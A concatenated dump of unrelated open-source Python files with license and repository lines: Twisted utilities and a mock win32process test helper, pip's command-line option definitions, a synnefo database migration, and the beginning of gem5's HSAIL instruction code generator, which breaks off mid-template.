lines = removeLeadingBlanks(lines)
lines.reverse()
return '\n'.join(lines)+'\n'
def splitQuoted(s):
"""
Like a string split, but don't break substrings inside quotes.
>>> splitQuoted('the "hairy monkey" likes pie')
['the', 'hairy monkey', 'likes', 'pie']
Another one of those "someone must have a better solution for
this" things. This implementation is a VERY DUMB hack done too
quickly.
"""
out = []
quot = None
phrase = None
for word in s.split():
if phrase is None:
if word and (word[0] in ("\"", "'")):
quot = word[0]
word = word[1:]
phrase = []
if phrase is None:
out.append(word)
else:
if word and (word[-1] == quot):
word = word[:-1]
phrase.append(word)
out.append(" ".join(phrase))
phrase = None
else:
phrase.append(word)
return out
def strFile(p, f, caseSensitive=True):
"""
Find whether string C{p} occurs in a read()able object C{f}.
@rtype: C{bool}
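A short illustrative example (using StringIO as the readable object):
>>> from StringIO import StringIO
>>> strFile('needle', StringIO('a haystack with a needle in it'))
True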
"""
buf = ""
buf_len = max(len(p), 2**2**2**2)
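# (2**2**2**2 is right-associative, i.e. 2**(2**(2**2)) == 2**16 == 65536,
# so the read buffer is at least 64 KiB)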
if not caseSensitive:
p = p.lower()
while 1:
r = f.read(buf_len-len(p))
if not caseSensitive:
r = r.lower()
bytes_read = len(r)
if bytes_read == 0:
return False
l = len(buf)+bytes_read-buf_len
if l <= 0:
buf = buf + r
else:
buf = buf[l:] + r
if buf.find(p) != -1:
return True
|
bsd-3-clause
|
ehashman/oh-mainline
|
vendor/packages/twisted/twisted/test/mock_win32process.py
|
82
|
1499
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This is a mock win32process module.
The purpose of this module is mock process creation for the PID test.
CreateProcess(...) will spawn a process, and always return a PID of 42.
"""
import win32process
GetExitCodeProcess = win32process.GetExitCodeProcess
STARTUPINFO = win32process.STARTUPINFO
STARTF_USESTDHANDLES = win32process.STARTF_USESTDHANDLES
def CreateProcess(appName,
cmdline,
procSecurity,
threadSecurity,
inheritHandles,
newEnvironment,
env,
workingDir,
startupInfo):
"""
This function mocks the generated pid aspect of the win32process.CreateProcess
function.
- the true win32process.CreateProcess is called
- return values are harvested in a tuple.
- all return values from CreateProcess are passed back to the calling
function except for the pid; the returned pid is hardcoded to 42
"""
hProcess, hThread, dwPid, dwTid = win32process.CreateProcess(
appName,
cmdline,
procSecurity,
threadSecurity,
inheritHandles,
newEnvironment,
env,
workingDir,
startupInfo)
dwPid = 42
return (hProcess, hThread, dwPid, dwTid)
|
agpl-3.0
|
h4ck3rm1k3/pip
|
pip/cmdoptions.py
|
239
|
14701
|
"""
shared options and groups
The principle here is to define options once, but *not* instantiate them
globally. One reason being that options with action='append' can carry state
between parses. pip parses general options twice internally, and shouldn't
pass on state. To be consistent, all options will follow this design.
"""
from __future__ import absolute_import
from functools import partial
from optparse import OptionGroup, SUPPRESS_HELP, Option
import warnings
from pip.index import (
PyPI, FormatControl, fmt_ctl_handle_mutual_exclude, fmt_ctl_no_binary,
fmt_ctl_no_use_wheel)
from pip.locations import CA_BUNDLE_PATH, USER_CACHE_DIR, src_prefix
def make_option_group(group, parser):
"""
Return an OptionGroup object
group -- assumed to be dict with 'name' and 'options' keys
parser -- an optparse Parser
"""
option_group = OptionGroup(parser, group['name'])
for option in group['options']:
option_group.add_option(option())
return option_group
def resolve_wheel_no_use_binary(options):
if not options.use_wheel:
control = options.format_control
fmt_ctl_no_use_wheel(control)
def check_install_build_global(options, check_options=None):
"""Disable wheels if per-setup.py call options are set.
:param options: The OptionParser options to update.
:param check_options: The options to check, if not supplied defaults to
options.
"""
if check_options is None:
check_options = options
def getname(n):
return getattr(check_options, n, None)
names = ["build_options", "global_options", "install_options"]
if any(map(getname, names)):
control = options.format_control
fmt_ctl_no_binary(control)
warnings.warn(
'Disabling all use of wheels due to the use of --build-options '
'/ --global-options / --install-options.', stacklevel=2)
###########
# options #
###########
help_ = partial(
Option,
'-h', '--help',
dest='help',
action='help',
help='Show help.')
isolated_mode = partial(
Option,
"--isolated",
dest="isolated_mode",
action="store_true",
default=False,
help=(
"Run pip in an isolated mode, ignoring environment variables and user "
"configuration."
),
)
require_virtualenv = partial(
Option,
# Run only if inside a virtualenv, bail if not.
'--require-virtualenv', '--require-venv',
dest='require_venv',
action='store_true',
default=False,
help=SUPPRESS_HELP)
verbose = partial(
Option,
'-v', '--verbose',
dest='verbose',
action='count',
default=0,
help='Give more output. Option is additive, and can be used up to 3 times.'
)
version = partial(
Option,
'-V', '--version',
dest='version',
action='store_true',
help='Show version and exit.')
quiet = partial(
Option,
'-q', '--quiet',
dest='quiet',
action='count',
default=0,
help='Give less output.')
log = partial(
Option,
"--log", "--log-file", "--local-log",
dest="log",
metavar="path",
help="Path to a verbose appending log."
)
log_explicit_levels = partial(
Option,
# Write the log levels explicitly to the log
'--log-explicit-levels',
dest='log_explicit_levels',
action='store_true',
default=False,
help=SUPPRESS_HELP)
no_input = partial(
Option,
# Don't ask for input
'--no-input',
dest='no_input',
action='store_true',
default=False,
help=SUPPRESS_HELP)
proxy = partial(
Option,
'--proxy',
dest='proxy',
type='str',
default='',
help="Specify a proxy in the form [user:passwd@]proxy.server:port.")
retries = partial(
Option,
'--retries',
dest='retries',
type='int',
default=5,
help="Maximum number of retries each connection should attempt "
"(default %default times).")
timeout = partial(
Option,
'--timeout', '--default-timeout',
metavar='sec',
dest='timeout',
type='float',
default=15,
help='Set the socket timeout (default %default seconds).')
default_vcs = partial(
Option,
# The default version control system for editables, e.g. 'svn'
'--default-vcs',
dest='default_vcs',
type='str',
default='',
help=SUPPRESS_HELP)
skip_requirements_regex = partial(
Option,
# A regex to be used to skip requirements
'--skip-requirements-regex',
dest='skip_requirements_regex',
type='str',
default='',
help=SUPPRESS_HELP)
def exists_action():
return Option(
# Option when path already exist
'--exists-action',
dest='exists_action',
type='choice',
choices=['s', 'i', 'w', 'b'],
default=[],
action='append',
metavar='action',
help="Default action when a path already exists: "
"(s)witch, (i)gnore, (w)ipe, (b)ackup.")
cert = partial(
Option,
'--cert',
dest='cert',
type='str',
default=CA_BUNDLE_PATH,
metavar='path',
help="Path to alternate CA bundle.")
client_cert = partial(
Option,
'--client-cert',
dest='client_cert',
type='str',
default=None,
metavar='path',
help="Path to SSL client certificate, a single file containing the "
"private key and the certificate in PEM format.")
index_url = partial(
Option,
'-i', '--index-url', '--pypi-url',
dest='index_url',
metavar='URL',
default=PyPI.simple_url,
help='Base URL of Python Package Index (default %default).')
def extra_index_url():
return Option(
'--extra-index-url',
dest='extra_index_urls',
metavar='URL',
action='append',
default=[],
help='Extra URLs of package indexes to use in addition to --index-url.'
)
no_index = partial(
Option,
'--no-index',
dest='no_index',
action='store_true',
default=False,
help='Ignore package index (only looking at --find-links URLs instead).')
def find_links():
return Option(
'-f', '--find-links',
dest='find_links',
action='append',
default=[],
metavar='url',
help="If a url or path to an html file, then parse for links to "
"archives. If a local path or file:// url that's a directory,"
"then look for archives in the directory listing.")
def allow_external():
return Option(
"--allow-external",
dest="allow_external",
action="append",
default=[],
metavar="PACKAGE",
help="Allow the installation of a package even if it is externally "
"hosted",
)
allow_all_external = partial(
Option,
"--allow-all-external",
dest="allow_all_external",
action="store_true",
default=False,
help="Allow the installation of all packages that are externally hosted",
)
def trusted_host():
return Option(
"--trusted-host",
dest="trusted_hosts",
action="append",
metavar="HOSTNAME",
default=[],
help="Mark this host as trusted, even though it does not have valid "
"or any HTTPS.",
)
# Remove after 7.0
no_allow_external = partial(
Option,
"--no-allow-external",
dest="allow_all_external",
action="store_false",
default=False,
help=SUPPRESS_HELP,
)
# Remove --allow-insecure after 7.0
def allow_unsafe():
return Option(
"--allow-unverified", "--allow-insecure",
dest="allow_unverified",
action="append",
default=[],
metavar="PACKAGE",
help="Allow the installation of a package even if it is hosted "
"in an insecure and unverifiable way",
)
# Remove after 7.0
no_allow_unsafe = partial(
Option,
"--no-allow-insecure",
dest="allow_all_insecure",
action="store_false",
default=False,
help=SUPPRESS_HELP
)
# Remove after 1.5
process_dependency_links = partial(
Option,
"--process-dependency-links",
dest="process_dependency_links",
action="store_true",
default=False,
help="Enable the processing of dependency links.",
)
def constraints():
return Option(
'-c', '--constraint',
dest='constraints',
action='append',
default=[],
metavar='file',
help='Constrain versions using the given constraints file. '
'This option can be used multiple times.')
def requirements():
return Option(
'-r', '--requirement',
dest='requirements',
action='append',
default=[],
metavar='file',
help='Install from the given requirements file. '
'This option can be used multiple times.')
def editable():
return Option(
'-e', '--editable',
dest='editables',
action='append',
default=[],
metavar='path/url',
help=('Install a project in editable mode (i.e. setuptools '
'"develop mode") from a local project path or a VCS url.'),
)
src = partial(
Option,
'--src', '--source', '--source-dir', '--source-directory',
dest='src_dir',
metavar='dir',
default=src_prefix,
help='Directory to check out editable projects into. '
'The default in a virtualenv is "<venv path>/src". '
'The default for global installs is "<current dir>/src".'
)
# XXX: deprecated, remove in 9.0
use_wheel = partial(
Option,
'--use-wheel',
dest='use_wheel',
action='store_true',
default=True,
help=SUPPRESS_HELP,
)
# XXX: deprecated, remove in 9.0
no_use_wheel = partial(
Option,
'--no-use-wheel',
dest='use_wheel',
action='store_false',
default=True,
help=('Do not find and prefer wheel archives when searching indexes and '
'find-links locations. DEPRECATED in favour of --no-binary.'),
)
def _get_format_control(values, option):
"""Get a format_control object."""
return getattr(values, option.dest)
def _handle_no_binary(option, opt_str, value, parser):
existing = getattr(parser.values, option.dest)
fmt_ctl_handle_mutual_exclude(
value, existing.no_binary, existing.only_binary)
def _handle_only_binary(option, opt_str, value, parser):
existing = getattr(parser.values, option.dest)
fmt_ctl_handle_mutual_exclude(
value, existing.only_binary, existing.no_binary)
def no_binary():
return Option(
"--no-binary", dest="format_control", action="callback",
callback=_handle_no_binary, type="str",
default=FormatControl(set(), set()),
help="Do not use binary packages. Can be supplied multiple times, and "
"each time adds to the existing value. Accepts either :all: to "
"disable all binary packages, :none: to empty the set, or one or "
"more package names with commas between them. Note that some "
"packages are tricky to compile and may fail to install when "
"this option is used on them.")
def only_binary():
return Option(
"--only-binary", dest="format_control", action="callback",
callback=_handle_only_binary, type="str",
default=FormatControl(set(), set()),
help="Do not use source packages. Can be supplied multiple times, and "
"each time adds to the existing value. Accepts either :all: to "
"disable all source packages, :none: to empty the set, or one or "
"more package names with commas between them. Packages without "
"binary distributions will fail to install when this option is "
"used on them.")
cache_dir = partial(
Option,
"--cache-dir",
dest="cache_dir",
default=USER_CACHE_DIR,
metavar="dir",
help="Store the cache data in <dir>."
)
no_cache = partial(
Option,
"--no-cache-dir",
dest="cache_dir",
action="store_false",
help="Disable the cache.",
)
download_cache = partial(
Option,
'--download-cache',
dest='download_cache',
default=None,
help=SUPPRESS_HELP)
no_deps = partial(
Option,
'--no-deps', '--no-dependencies',
dest='ignore_dependencies',
action='store_true',
default=False,
help="Don't install package dependencies.")
build_dir = partial(
Option,
'-b', '--build', '--build-dir', '--build-directory',
dest='build_dir',
metavar='dir',
help='Directory to unpack packages into and build in.'
)
install_options = partial(
Option,
'--install-option',
dest='install_options',
action='append',
metavar='options',
help="Extra arguments to be supplied to the setup.py install "
"command (use like --install-option=\"--install-scripts=/usr/local/"
"bin\"). Use multiple --install-option options to pass multiple "
"options to setup.py install. If you are using an option with a "
"directory path, be sure to use absolute path.")
global_options = partial(
Option,
'--global-option',
dest='global_options',
action='append',
metavar='options',
help="Extra global options to be supplied to the setup.py "
"call before the install command.")
no_clean = partial(
Option,
'--no-clean',
action='store_true',
default=False,
help="Don't clean up build directories.")
disable_pip_version_check = partial(
Option,
"--disable-pip-version-check",
dest="disable_pip_version_check",
action="store_true",
default=False,
help="Don't periodically check PyPI to determine whether a new version "
"of pip is available for download. Implied with --no-index.")
# Deprecated, Remove later
always_unzip = partial(
Option,
'-Z', '--always-unzip',
dest='always_unzip',
action='store_true',
help=SUPPRESS_HELP,
)
##########
# groups #
##########
general_group = {
'name': 'General Options',
'options': [
help_,
isolated_mode,
require_virtualenv,
verbose,
version,
quiet,
log,
log_explicit_levels,
no_input,
proxy,
retries,
timeout,
default_vcs,
skip_requirements_regex,
exists_action,
trusted_host,
cert,
client_cert,
cache_dir,
no_cache,
disable_pip_version_check,
]
}
index_group = {
'name': 'Package Index Options',
'options': [
index_url,
extra_index_url,
no_index,
find_links,
allow_external,
allow_all_external,
no_allow_external,
allow_unsafe,
no_allow_unsafe,
process_dependency_links,
]
}
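# A minimal usage sketch (added for illustration; not part of upstream pip):
# exposing the general options group on a plain optparse parser. The example
# arguments are hypothetical.
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser(add_help_option=False) # help_ above supplies -h
parser.add_option_group(make_option_group(general_group, parser))
opts, args = parser.parse_args(['-v', '--timeout', '30'])
print("verbose=%s timeout=%s" % (opts.verbose, opts.timeout))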
|
mit
|
dimara/synnefo
|
snf-cyclades-app/synnefo/db/migrations/0046_auto__chg_field_backend_password_hash.py
|
10
|
11564
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Backend.password_hash'
db.alter_column('db_backend', 'password_hash', self.gf('django.db.models.fields.CharField')(max_length=128, null=True, blank=True))
def backwards(self, orm):
# Changing field 'Backend.password_hash'
db.alter_column('db_backend', 'password_hash', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True))
models = {
'db.backend': {
'Meta': {'object_name': 'Backend'},
'clustername': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'ctotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'dfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'drained': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'dtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offline': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'password_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'pinst_cnt': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'port': ('django.db.models.fields.PositiveIntegerField', [], {'default': '5080'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
'db.backendnetwork': {
'Meta': {'object_name': 'BackendNetwork'},
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'networks'", 'to': "orm['db.Backend']"}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'backend_networks'", 'to': "orm['db.Network']"}),
'operstate': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '30'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'db.bridgepool': {
'Meta': {'object_name': 'BridgePool'},
'available': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'db.flavor': {
'Meta': {'unique_together': "(('cpu', 'ram', 'disk', 'disk_template'),)", 'object_name': 'Flavor'},
'cpu': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'disk': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'disk_template': ('django.db.models.fields.CharField', [], {'default': "'drbd'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ram': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'db.macprefixpool': {
'Meta': {'object_name': 'MacPrefixPool'},
'available': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'db.network': {
'Meta': {'object_name': 'Network'},
'action': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'dhcp': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'gateway': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'gateway6': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'mac_prefix': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'machines': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['db.VirtualMachine']", 'through': "orm['db.NetworkInterface']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'reservations': ('django.db.models.fields.TextField', [], {'default': "''"}),
'state': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '32'}),
'subnet': ('django.db.models.fields.CharField', [], {'default': "'10.0.0.0/24'", 'max_length': '32'}),
'subnet6': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'PRIVATE_PHYSICAL_VLAN'", 'max_length': '50'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'db.networkinterface': {
'Meta': {'object_name': 'NetworkInterface'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'firewall_profile': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {}),
'ipv4': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'}),
'ipv6': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'machine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.VirtualMachine']"}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.Network']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'db.virtualmachine': {
'Meta': {'object_name': 'VirtualMachine'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'virtual_machines'", 'null': 'True', 'to': "orm['db.Backend']"}),
'backend_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'buildpercentage': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'flavor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['db.Flavor']"}),
'hostid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'operstate': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'suspended': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'db.virtualmachinemetadata': {
'Meta': {'unique_together': "(('meta_key', 'vm'),)", 'object_name': 'VirtualMachineMetadata'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_key': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'meta_value': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'vm': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'metadata'", 'to': "orm['db.VirtualMachine']"})
}
}
complete_apps = ['db']
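# Usage sketch (South, assuming the app is already at migration 0045):
#
#     python manage.py migrate db 0046
#
# forwards() widens Backend.password_hash to 128 chars; backwards() restores 64.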
|
gpl-3.0
|
Weil0ng/gem5
|
src/arch/hsail/gen.py
|
10
|
27196
|
#! /usr/bin/python
#
# Copyright (c) 2015 Advanced Micro Devices, Inc.
# All rights reserved.
#
# For use for simulation and test purposes only
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Steve Reinhardt
#
import sys, re
from m5.util import code_formatter
if len(sys.argv) != 4:
print "Error: need 3 args (file names)"
sys.exit(1)  # exit non-zero so the build system notices the usage error
header_code = code_formatter()
decoder_code = code_formatter()
exec_code = code_formatter()
###############
#
# Generate file prologs (includes etc.)
#
###############
header_code('''
#include "arch/hsail/insts/decl.hh"
#include "base/bitfield.hh"
#include "gpu-compute/hsail_code.hh"
#include "gpu-compute/wavefront.hh"
namespace HsailISA
{
''')
header_code.indent()
decoder_code('''
#include "arch/hsail/gpu_decoder.hh"
#include "arch/hsail/insts/branch.hh"
#include "arch/hsail/insts/decl.hh"
#include "arch/hsail/insts/gen_decl.hh"
#include "arch/hsail/insts/mem.hh"
#include "arch/hsail/insts/mem_impl.hh"
#include "gpu-compute/brig_object.hh"
namespace HsailISA
{
std::vector<GPUStaticInst*> Decoder::decodedInsts;
GPUStaticInst*
Decoder::decode(MachInst machInst)
{
using namespace Brig;
const BrigInstBase *ib = machInst.brigInstBase;
const BrigObject *obj = machInst.brigObj;
switch(ib->opcode) {
''')
decoder_code.indent()
decoder_code.indent()
exec_code('''
#include "arch/hsail/insts/gen_decl.hh"
#include "base/intmath.hh"
namespace HsailISA
{
''')
exec_code.indent()
###############
#
# Define code templates for class declarations (for header file)
#
###############
# Basic header template for an instruction stub.
header_template_stub = '''
class $class_name : public $base_class
{
public:
typedef $base_class Base;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
# Basic header template for an instruction with no template parameters.
header_template_nodt = '''
class $class_name : public $base_class
{
public:
typedef $base_class Base;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
# Basic header template for an instruction with a single DataType
# template parameter.
header_template_1dt = '''
template<typename DataType>
class $class_name : public $base_class<DataType>
{
public:
typedef $base_class<DataType> Base;
typedef typename DataType::CType CType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
header_template_1dt_noexec = '''
template<typename DataType>
class $class_name : public $base_class<DataType>
{
public:
typedef $base_class<DataType> Base;
typedef typename DataType::CType CType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
};
'''
# Same as header_template_1dt, except the base class has a second
# template parameter NumSrcOperands to allow a variable number of
# source operands. Note that since this is implemented with an array,
# it only works for instructions where all sources are of the same
# type (like most arithmetics).
header_template_1dt_varsrcs = '''
template<typename DataType>
class $class_name : public $base_class<DataType, $num_srcs>
{
public:
typedef $base_class<DataType, $num_srcs> Base;
typedef typename DataType::CType CType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
# Header template for instruction with two DataType template
# parameters, one for the dest and one for the source. This is used
# by compare and convert.
header_template_2dt = '''
template<typename DestDataType, class SrcDataType>
class $class_name : public $base_class<DestDataType, SrcDataType>
{
public:
typedef $base_class<DestDataType, SrcDataType> Base;
typedef typename DestDataType::CType DestCType;
typedef typename SrcDataType::CType SrcCType;
$class_name(const Brig::BrigInstBase *ib, const BrigObject *obj)
: Base(ib, obj, "$opcode")
{
}
void execute(GPUDynInstPtr gpuDynInst);
};
'''
header_templates = {
'ArithInst': header_template_1dt_varsrcs,
'CmovInst': header_template_1dt,
'ClassInst': header_template_1dt,
'ShiftInst': header_template_1dt,
'ExtractInsertInst': header_template_1dt,
'CmpInst': header_template_2dt,
'CvtInst': header_template_2dt,
'PopcountInst': header_template_2dt,
'LdInst': '',
'StInst': '',
'SpecialInstNoSrc': header_template_nodt,
'SpecialInst1Src': header_template_nodt,
'SpecialInstNoSrcNoDest': '',
'Stub': header_template_stub,
}
###############
#
# Define code templates for exec functions
#
###############
# exec function body
exec_template_stub = '''
void
$class_name::execute(GPUDynInstPtr gpuDynInst)
{
fatal("instruction unimplemented %s\\n", gpuDynInst->disassemble());
}
'''
exec_template_nodt_nosrc = '''
void
$class_name::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
typedef Base::DestCType DestCType;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
DestCType dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_nodt_1src = '''
void
$class_name::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
typedef Base::DestCType DestCType;
typedef Base::SrcCType SrcCType;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
SrcCType src_val0 = this->src0.get<SrcCType>(w, lane);
DestCType dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_1dt_varsrcs = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<CType>(w, lane);
}
CType src_val[$num_srcs];
for (int i = 0; i < $num_srcs; ++i) {
src_val[i] = this->src[i].template get<CType>(w, lane);
}
dest_val = (CType)($expr);
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_1dt_3srcs = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
